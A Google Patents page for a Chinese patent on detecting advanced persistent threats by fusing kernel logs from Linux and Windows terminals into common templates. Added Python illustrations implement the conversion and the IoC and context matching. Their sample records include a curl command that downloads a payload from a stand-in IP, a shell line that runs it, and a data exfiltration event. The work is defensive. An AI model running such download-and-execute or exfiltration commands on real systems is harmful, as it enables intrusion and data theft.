CN115037523B - APT detection method for heterogeneous terminal log fusion - Google Patents
- Publication number: CN115037523B (application CN202210540642.5A)
- Authority: CN (China)
- Prior art keywords: log data, event, data, ioc, attack
- Legal status: Active (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Classifications
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D10/00—Energy efficient computing, e.g. low power processors, power management or thermal management
Abstract
The invention discloses an APT detection method for heterogeneous terminal log fusion, which comprises the following steps: collecting log data of each heterogeneous terminal, wherein the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data; converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template; and carrying out APT detection based on the log data in the universal format. The APT detection method for heterogeneous terminal log fusion meets the requirement of carrying out APT detection on multi-platform log data at the same time.
Description
Technical Field
The invention belongs to the technical field of APT attack detection, and particularly relates to an APT detection method for heterogeneous terminal log fusion.
Background
APT (Advanced Persistent Threat) attacks generally refer to attacks launched against governments, core infrastructure (e.g., energy, transportation, communications) and important industries (e.g., military, financial, medical). Compared with traditional attacks, an APT attack is characterised by long duration, a long attack chain, high concealment, multiple means and strong harm, and can be carried out through social engineering, 0-day vulnerabilities, infected storage media and other means. It is therefore difficult to detect a complete APT attack chain directly with existing detection methods; instead, once an analyst detects a certain attack step at a certain point in time, the analyst quickly locates the entry point and determines the range of the attack through forensic analysis, and then carries out remedial measures. Forensic analysis generally uses system logs to record entities (such as processes and files) and the information flows among them (such as reading, writing and creating), and visually presents the dependency relationships among the entities as a directed graph, where the vertices are entities and the edges are information flows.
According to research, most APT detection targets only one specific kind of terminal log, such as Linux low-level logs, Windows logs, Android logs or traffic logs. However, most APT attacks do not attack only one host; more often they attack and spread through all hosts in an intranet, and the hosts in an intranet do not all run the same system, so current APT detection methods for a single terminal log increasingly fail to meet daily detection requirements.
Disclosure of Invention
The invention aims to provide an APT detection method for heterogeneous terminal log fusion, which meets the requirement of carrying out APT detection on multi-platform log data at the same time.
In order to achieve the above purpose, the technical scheme adopted by the invention is as follows:
An APT detection method for heterogeneous terminal log fusion, which includes:
step 1, collecting log data of each heterogeneous terminal, wherein the log data comprises object log data and event log data, and the object log data comprises process object log data and file object log data;
Step 2, converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template;
Step 3, performing APT detection based on the universal format log data, including:
Step 31, IoC feature matching: taking IoC features generated by APT attack as attack sample IoC features, extracting IoC features from each piece of universal format log data, and judging the corresponding universal format log data as preliminary attack log data if the extracted IoC features are consistent with the attack sample IoC features;
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
The following provides several alternatives, but not as additional limitations to the above-described overall scheme, and only further additions or preferences, each of which may be individually combined for the above-described overall scheme, or may be combined among multiple alternatives, without technical or logical contradictions.
Preferably, the log data is kernel log data.
Preferably, the contents of the process object data template include: the unique identification number UUID, the process type, the process number cid, the parent process number parentSubject of the process, the permission localPrincipal under which the process runs, the time startTimestampNanos of process creation, the process unit ID unitID, the process unit iteration, the process unit count, the command cmdLine of process execution, the permission PRIVILEGELEVEL of the process, the loaded library importedLibraries, the imported library exportedLibraries, and the attributes properties.
Preferably, the contents of the file object data template include: the unique identification number UUID, the object type baseObject, the file type, the file descriptor fileDescriptor, the rights localPrincipal to which the file belongs, the file size, the portable execution identification peInfo (Windows), and the file hash value hashes.
Preferably, the content of the event data template includes: the unique identifier UUID, sequence number sequence, event type, subject process number threadId, subject UUID subject, object 1 unique identifier predicateObject, object 1 path predicateObjectPath, object 2 unique identifier predicateObject2, object 2 path predicateObject2Path, event occurrence time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, and attribute properties.
Preferably, if the coincidence ratio between the IoC features extracted from a piece of universal format log data and the attack sample IoC features is greater than a similarity threshold, the extracted IoC features are judged to coincide with the attack sample IoC features; otherwise, they are judged not to coincide.
The APT detection method for heterogeneous terminal log fusion provided by the invention has the beneficial effects that:
1) A universal data template is designed that unifies the log data of multiple platforms, so that log data from multiple platforms can be analysed at the same time; the universal data format stores the kernel log data of all platforms in a unified format, which provides a good basis for subsequent cross-host analysis;
2) The universal log data contain the information required for APT detection, including context behavior information among objects, so APT detection can combine context behavior information and its accuracy is improved;
3) Each platform customises its own conversion method on the basis of the universal data template, which improves extensibility;
4) Combining IoC features with context behavior analysis to detect APT attacks gives higher accuracy and traceability.
Drawings
Fig. 1 is a flowchart of an APT detection method for heterogeneous terminal log fusion of the present invention.
Detailed Description
The following description of the embodiments of the present invention will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present invention, but not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to be within the scope of the invention.
Unless defined otherwise, all technical and scientific terms used herein have the same meaning as commonly understood by one of ordinary skill in the art to which this invention belongs. The terminology used herein in the description of the invention is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention.
In order to overcome the defect that multiple platforms cannot uniformly detect APT in the prior art, the embodiment provides an APT detection method for heterogeneous terminal log fusion. As shown in fig. 1, the APT detection method for heterogeneous terminal log fusion of the present embodiment includes the following steps:
Step 1, collecting log data of each heterogeneous terminal, wherein the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data.
Log data collection tool selection: because no single log data collection tool works across different operating systems, a suitable tool needs to be selected for each platform, and it needs to meet the following requirements:
(1) It can acquire kernel log data. Kernel log data differ little across platforms, whereas application-level log data differ greatly and are harder to analyse; kernel log data also record good semantic information and show the relations among system objects well, which supports the subsequent detection of APT attacks based on context behavior information.
(2) It collects the necessary log information. Since the collected data are used for APT detection, the log data need to contain designated information such as process, file and event information.
(3) Its overhead is small, and must be kept at a relatively low level so that data can be acquired and analysed over the long term.
Collecting log data: start the log data acquisition tool after boot, stop it before shutdown, and store the acquired log data for subsequent analysis.
Step 2, converting the collected process object log data into universal format log data (or simply universal log data) based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template.
In this embodiment, for the object log data in the kernel log data, a general data template is designed, where the general data template includes the object log information that is stored in the kernel log data of each platform, and information required for detection. For event log data in the kernel log data, necessary event information and attribute are selected to be designed into a universal data template.
The data templates designed in this embodiment are specifically as follows:
(1) Object log data: since the object log data is divided into process object log data and file object log data, which have different attributes, different data templates need to be designed.
The data structure of the process object data template is as follows:
The process object data template includes main information including a unique identification number UUID, a process type, a process number cid, a parent process number parentSubject of a process, a process use permission localPrincipal, a time startTimestampNanos of process creation, a process unit ID unitID, a process unit iteration, a process unit count, a command cmdLine of process execution, a permission PRIVILEGELEVEL (WINDOWS) of a process, a loaded library importedLibraries, an imported library exportedLibraries, an attribute properties, and the like.
The process number and the parent process number can represent parent-child relations among processes, and executed commands and attributes can be used for detecting whether suspicious operations exist.
The data structure of the file object data template is as follows:
The file object data template contains main information including a unique identification number UUID, an object type baseObject, a file type, a file descriptor fileDescriptor, rights localPrincipal to which the file belongs, a file size, a portable execution identifier peInfo (Windows), a file hash value hashes, and the like.
(2) Event log data: for event log data in the kernel log data, necessary event information and attribute are selected to be designed into a universal data template.
The data structure of the event data templates is as follows.
The event data template contains main information including a unique identifier UUID, sequence number sequence, event type, subject process number threadId, subject UUID subject, object 1 unique identifier predicateObject, object 1 path predicateObjectPath, object 2 unique identifier predicateObject2, object 2 path predicateObject2Path, event occurrence time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, attribute properties, and the like.
It is easy to understand that the fields in the data templates are the fields necessary for APT detection provided in this embodiment, and in other embodiments, corresponding expansion may be performed on the basis of the data templates provided in this embodiment.
According to the embodiment, based on a preset universal data template, log data collected from each heterogeneous terminal are converted into a universal data format so as to facilitate subsequent APT detection on multiple platforms at the same time, wherein the detailed steps of log data conversion are as follows:
Log data analysis: analyse the collected log data and extract the fields and values required by the data template.
Log data conversion: convert the information extracted from the log data into the universal data format based on the corresponding data template.
Example 1: the collected file object log data are converted into universal format log data as follows (the UUID is rendered as 16 signed bytes):
{"uuid":[-36,-80,31,-8,122,28,-120,63,-90,-22,-49,21,-63,124,66,63],"baseObject":{"permission":[1,36],"epoch":0,"properties":{"path":"/proc/22878/cmdline"}},"type":"FILE_OBJECT_FILE","fileDescriptor":null,"localPrincipal":null,"size":null,"peInfo":null,"hashes":null}
Example 2: the collected event log data are converted into universal format log data as follows:
{"uuid":[-76,-108,48,44,82,93,13,-118,92,-107,33,-108,124,-57,-13,-109],"sequence":231,"type":"EVENT_EXECUTE","threadId":22354,"subject":[-126,110,103,-95,-7,119,88,-116,6,63,-121,-11,93,-26,58,59],"predicateObject":[-100,101,-87,-23,-14,37,62,122,-115,-101,82,-127,-119,-68,3,71],"predicateObjectPath":null,"predicateObject2":null,"predicateObject2Path":null,"timestampNanos":1615796054065000000,"names":null,"parameters":null,"location":null,"size":null,"programPoint":null,"properties":{}}
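A worked conversion into the three universal templates, added here as an illustration and not code from the patent or any product: two constructed raw records (an auditd-style Linux execve and a Sysmon-style Windows process-creation event) are mapped onto the process object, file object and event templates using the field names listed above, so that logs from both terminals become one fused event stream. The UUID derivation, the simplified raw field names and every event type name other than EVENT_EXECUTE and FILE_OBJECT_FILE are assumptions.

```python
import hashlib
import json

# Fields of the three universal templates, in the order the page lists them.
PROCESS_FIELDS = ["uuid", "type", "cid", "parentSubject", "localPrincipal",
                  "startTimestampNanos", "unitId", "iteration", "count", "cmdLine",
                  "privilegeLevel", "importedLibraries", "exportedLibraries", "properties"]
FILE_FIELDS = ["uuid", "baseObject", "type", "fileDescriptor", "localPrincipal",
               "size", "peInfo", "hashes"]
EVENT_FIELDS = ["uuid", "sequence", "type", "threadId", "subject", "predicateObject",
                "predicateObjectPath", "predicateObject2", "predicateObject2Path",
                "timestampNanos", "names", "parameters", "location", "size",
                "programPoint", "properties"]

# Platform-native event kinds -> universal event types (names other than EVENT_EXECUTE
# are assumptions; Sysmon Event ID 1 is process creation, 11 is file creation).
LINUX_EVENT_TYPES = {"execve": "EVENT_EXECUTE", "read": "EVENT_READ", "write": "EVENT_WRITE"}
WINDOWS_EVENT_TYPES = {1: "EVENT_EXECUTE", 11: "EVENT_WRITE"}

# Constructed raw records with simplified field names: an auditd-style Linux execve
# and a Sysmon-style Windows process-creation event.
LINUX_RAW = {"syscall": "execve", "pid": 22354, "ppid": 22300, "uid": 1000,
             "exe": "/usr/bin/curl", "comm": "curl -o /tmp/dl/payload http://203.0.113.7/p",
             "time_ns": 1615796054065000000}
WINDOWS_RAW = {"EventID": 1, "ProcessId": 4412, "ParentProcessId": 812, "User": "HOST\\alice",
               "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami",
               "IntegrityLevel": "Medium", "UtcTimeNs": 1615796060000000000,
               "Hashes": "SHA256=" + "ab" * 32}  # constructed placeholder hash


def make_uuid(platform, kind, native_id):
    """Deterministic 16-byte identifier rendered as signed bytes, as in the page's
    examples. The derivation scheme is an assumption; the page does not specify one."""
    digest = hashlib.sha256(f"{platform}:{kind}:{native_id}".encode()).digest()[:16]
    return [b - 256 if b > 127 else b for b in digest]


def fill(fields, values):
    """Emit every template field; information the source lacks becomes null."""
    return {f: values.get(f) for f in fields}


def linux_to_universal(r, seq):
    """Linux record -> (process object, file object, event) in the universal format."""
    subj = make_uuid("linux", "process", r["pid"])
    obj = make_uuid("linux", "file", r["exe"])
    proc = fill(PROCESS_FIELDS, {
        "uuid": subj, "type": "SUBJECT_PROCESS", "cid": r["pid"],
        "parentSubject": make_uuid("linux", "process", r["ppid"]),
        "localPrincipal": str(r["uid"]), "startTimestampNanos": r["time_ns"],
        "cmdLine": r["comm"], "properties": {}})
    fobj = fill(FILE_FIELDS, {
        "uuid": obj, "type": "FILE_OBJECT_FILE",
        "baseObject": {"properties": {"path": r["exe"]}}})
    event = fill(EVENT_FIELDS, {
        "uuid": make_uuid("linux", "event", seq), "sequence": seq,
        "type": LINUX_EVENT_TYPES[r["syscall"]], "threadId": r["pid"], "subject": subj,
        "predicateObject": obj, "predicateObjectPath": r["exe"],
        "timestampNanos": r["time_ns"], "properties": {}})
    return proc, fobj, event


def windows_to_universal(r, seq):
    """Windows record -> (process object, file object, event); also fills the
    Windows-only privilegeLevel, peInfo and hashes fields."""
    subj = make_uuid("windows", "process", r["ProcessId"])
    obj = make_uuid("windows", "file", r["Image"])
    proc = fill(PROCESS_FIELDS, {
        "uuid": subj, "type": "SUBJECT_PROCESS", "cid": r["ProcessId"],
        "parentSubject": make_uuid("windows", "process", r["ParentProcessId"]),
        "localPrincipal": r["User"], "startTimestampNanos": r["UtcTimeNs"],
        "cmdLine": r["CommandLine"], "privilegeLevel": r["IntegrityLevel"], "properties": {}})
    fobj = fill(FILE_FIELDS, {
        "uuid": obj, "type": "FILE_OBJECT_FILE",
        "baseObject": {"properties": {"path": r["Image"]}}, "peInfo": "PE",
        "hashes": dict(h.split("=", 1) for h in r["Hashes"].split(","))})
    event = fill(EVENT_FIELDS, {
        "uuid": make_uuid("windows", "event", seq), "sequence": seq,
        "type": WINDOWS_EVENT_TYPES[r["EventID"]], "threadId": r["ProcessId"],
        "subject": subj, "predicateObject": obj, "predicateObjectPath": r["Image"],
        "timestampNanos": r["UtcTimeNs"], "properties": {}})
    return proc, fobj, event


CONVERTERS = {"linux": linux_to_universal, "windows": windows_to_universal}


def fuse(records):
    """Convert (platform, raw) pairs from heterogeneous terminals and return one
    time-ordered stream of universal events, each with its process and file objects."""
    converted = [CONVERTERS[p](raw, seq) for seq, (p, raw) in enumerate(records, 1)]
    return sorted(converted, key=lambda t: t[2]["timestampNanos"])


if __name__ == "__main__":
    for proc, fobj, event in fuse([("windows", WINDOWS_RAW), ("linux", LINUX_RAW)]):
        print(json.dumps(event))
```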
Step 3, APT detection is carried out based on the universal format log data.
Step 31, IoC feature matching: taking IoC features generated by APT attack as attack sample IoC features, extracting IoC features from each piece of universal format log data, and judging the corresponding universal format log data as preliminary attack log data if the extracted IoC features are consistent with the attack sample IoC features.
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
In the embodiment, the method of combining IoC features and context behavior information is adopted to perform APT detection, the context behavior information is considered on the basis of single features, and the APT detection accuracy is remarkably improved.
The attack sample IoC features are IoC features extracted from log data recorded under a known APT attack, and serve as the control group for matching. Extracting IoC features is existing art and is not described in detail here. IoC feature matching analysis is also based on existing art, for example the method in the paper EXTRACTOR: Extracting Attack Behavior from Threat Reports: first the attack graph corresponding to the IoC features is obtained (it can be built in the universal data format), then that attack graph is matched against the provenance graph built from the massive logs (also in the universal data format), checking whether the attack graph corresponding to the IoC is present in it.
In IoC feature matching, if the coincidence ratio between the IoC features extracted from a piece of universal format log data and the attack sample IoC features is greater than a similarity threshold (for example, 0.95), the extracted IoC features coincide with the attack sample IoC features, that is, an attack is identified; otherwise, they do not coincide.
After the log data carrying the attack have been found through IoC feature matching, whether the attack is an APT attack is further analysed on the basis of the context behavior information, which improves the accuracy of APT detection. When judging an APT attack from the context behavior information, the ATT&CK model is used: it is checked whether the context information of the IoC features matches several techniques in the ATT&CK model; the two techniques code execution (Execution) and data exfiltration (Exfiltration) must both be present, and together with one or more other techniques they indicate an APT attack. The method of matching context behavior information may follow the paper CONAN: A Practical Real-Time APT Detection System with High Accuracy and Efficiency, and is not described in detail in this embodiment.
Example 1: assume the following attack events occur: a Linux system process downloads a file from a Windows system over network communication, the Linux system process executes the threat file to acquire privileges, and sensitive data are leaked and transmitted out. Analysing the IoC features: for the Linux process downloading a file from the Windows system over the network, there is a process log with network communication attributes, the process establishes communication with an external IP, and log records for creating and writing a file are produced; for the Linux process executing the threat file to acquire privileges, the file created in the previous step exists and a new process is created by executing an sh or bash command; for the leakage of sensitive data, the process created in the previous step reads the sensitive file and establishes communication with the external IP, producing log records of the transmitted data.
In this attack, the three stages are determined by matching IoC features; when all three stages are present and associated with one another, the attack is determined to be an APT attack. This further judgment is made through the context behavior information, and an alarm is raised once the APT attack is confirmed.
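The three-stage scenario above, carried through Step 31 and Step 32 as an added example (not the patent's own code): IoC features are extracted from constructed universal-format event records, compared with attack-sample IoC features using the coincidence ratio and the 0.95 threshold, and the preliminary hits are then chained through subject/object relations and checked against the rule that Execution and Exfiltration plus at least one other technique must be present. The feature scheme, the linkage rule, the tactic labels and every event type name other than EVENT_EXECUTE are assumptions.

```python
from collections import defaultdict

SIMILAR_THRESHOLD = 0.95  # similarity threshold from the page's example

# Attack-sample IoC features per ATT&CK tactic (constructed control group for Step 31).
SAMPLE_IOC = {
    "Command and Control": {"EVENT_CONNECT", "ip:203.0.113.7"},
    "Execution": {"EVENT_EXECUTE", "cmd:sh"},
    "Exfiltration": {"EVENT_SENDTO", "ip:203.0.113.7"},
}


def ev(uuid, etype, subject, obj=None, obj2=None, path=None, ts=0, **props):
    """Build a constructed universal-format event record (subset of the template's
    fields; UUIDs shortened to strings for readability)."""
    return {"uuid": uuid, "type": etype, "subject": subject, "predicateObject": obj,
            "predicateObject2": obj2, "predicateObjectPath": path,
            "timestampNanos": ts, "properties": props}


# Constructed log stream: the page's three-stage attack plus one benign shell command.
EVENTS = [
    ev("e1", "EVENT_CONNECT", "P1", ts=1, remoteAddress="203.0.113.7"),
    ev("e2", "EVENT_WRITE", "P1", obj="F1", path="/tmp/dl/payload", ts=2),
    ev("e3", "EVENT_EXECUTE", "P1", obj="F1", obj2="P2", path="/tmp/dl/payload", ts=3,
       cmdLine="sh /tmp/dl/payload"),
    ev("e4", "EVENT_READ", "P2", obj="F2", path="/srv/data/customers.db", ts=4),
    ev("e5", "EVENT_SENDTO", "P2", ts=5, remoteAddress="203.0.113.7"),
    ev("e6", "EVENT_EXECUTE", "P3", obj="F3", obj2="P4", path="/bin/ls", ts=6, cmdLine="ls -la"),
]


def extract_ioc_features(event):
    """IoC features of one record (constructed scheme): event type, remote IP, command."""
    feats = {event["type"]}
    props = event["properties"]
    if props.get("remoteAddress"):
        feats.add("ip:" + props["remoteAddress"])
    if props.get("cmdLine"):
        feats.add("cmd:" + props["cmdLine"].split()[0])
    return feats


def coincidence_ratio(extracted, sample):
    """Share of the attack-sample features that were found in the extracted features."""
    return len(extracted & sample) / len(sample) if sample else 0.0


def ioc_match(events, sample_ioc=SAMPLE_IOC, threshold=SIMILAR_THRESHOLD):
    """Step 31: records whose features coincide with an attack-sample IoC become
    preliminary attack log data, tagged with the tactic they matched."""
    hits = []
    for event in events:
        feats = extract_ioc_features(event)
        for tactic, sample in sample_ioc.items():
            if coincidence_ratio(feats, sample) > threshold:
                hits.append((tactic, event))
    return hits


def context_behavior(hits, events):
    """Step 32: keep only tactics whose hits are chained through provenance relations:
    the executed file was written by the C2 process, and the exfiltrating process is
    the one spawned by that execution (this linkage rule is an assumption)."""
    by_tactic = defaultdict(list)
    for tactic, event in hits:
        by_tactic[tactic].append(event)
    writes = {(e["subject"], e["predicateObject"]) for e in events if e["type"] == "EVENT_WRITE"}
    linked = set()
    for ex in by_tactic["Execution"]:
        for c2 in by_tactic["Command and Control"]:
            if (c2["subject"], ex["predicateObject"]) in writes:
                linked |= {"Command and Control", "Execution"}
                for xf in by_tactic["Exfiltration"]:
                    if xf["subject"] == ex["predicateObject2"]:
                        linked.add("Exfiltration")
    return linked


def is_apt(tactics):
    """Decision rule from the page: Execution and Exfiltration must both be present,
    together with at least one other technique."""
    return {"Execution", "Exfiltration"} <= set(tactics) and len(set(tactics)) >= 3


def detect(events):
    """Full pipeline over a universal-format event stream: IoC matching, then context."""
    return is_apt(context_behavior(ioc_match(events), events))


if __name__ == "__main__":
    print("APT detected:", detect(EVENTS))
```

Dropping the write event e2 leaves all three IoC hits in place but breaks the chain, so the context step rejects them; this is the difference between single-feature matching and the combined method.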
The technical features of the above-described embodiments may be arbitrarily combined, and all possible combinations of the technical features in the above-described embodiments are not described for brevity of description, however, as long as there is no contradiction between the combinations of the technical features, they should be considered as the scope of the description.
The above examples merely represent a few embodiments of the present invention, which are described in more detail and are not to be construed as limiting the scope of the invention. It should be noted that it will be apparent to those skilled in the art that several variations and modifications can be made without departing from the spirit of the invention, which are all within the scope of the invention. Accordingly, the scope of the invention should be assessed as that of the appended claims.
Claims (1)
1. The APT detection method for heterogeneous terminal log fusion is characterized by comprising the following steps of:
Step 1, collecting log data of each heterogeneous terminal, wherein the log data are kernel log data, the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data;
Step 2, converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template;
The content of the process object data template comprises: unique identification number UUID, process category type, process number cid, parent process number parentSubject of the process, process use right localPrincipal, time startTimestampNanos of process creation, process unit ID unitID, process unit iteration, process unit count, command cmdLine of process execution, right PRIVILEGELEVEL of the process, loaded library importedLibraries, imported library exportedLibraries, and properties;
The content of the file object data template comprises: a unique identification number UUID, an object type baseObject, a file type, a file descriptor fileDescriptor, rights localPrincipal to which the file belongs, a file size, a portable execution identifier peInfo, and a file hash value hashes;
The content of the event data template comprises: unique identification UUID, sequence number sequence, event type, subject process number threadId, subject UUID subject, object 1 unique identification predicateObject, object 1 path predicateObjectPath, object 2 unique identification predicateObject2, object 2 path predicateObject2Path, event time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, and attributes properties;
Step 3, performing APT detection based on the universal format log data, including:
Step 31, IoC feature matching: taking IoC features generated by APT attack as attack sample IoC features, extracting IoC features from each piece of universal format log data, and judging the corresponding universal format log data as preliminary attack log data if the extracted IoC features are consistent with the attack sample IoC features; if the coincidence ratio between the IoC features extracted from a piece of universal format log data and the attack sample IoC features is greater than a similarity threshold, the extracted IoC features are consistent with the attack sample IoC features; otherwise, they do not coincide;
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210540642.5A CN115037523B (en) | 2022-05-17 | 2022-05-17 | APT detection method for heterogeneous terminal log fusion |
Publications (2)
Publication Number | Publication Date |
---|---|
CN115037523A CN115037523A (en) | 2022-09-09 |
CN115037523B true CN115037523B (en) | 2024-05-17 |
Family
ID=83121160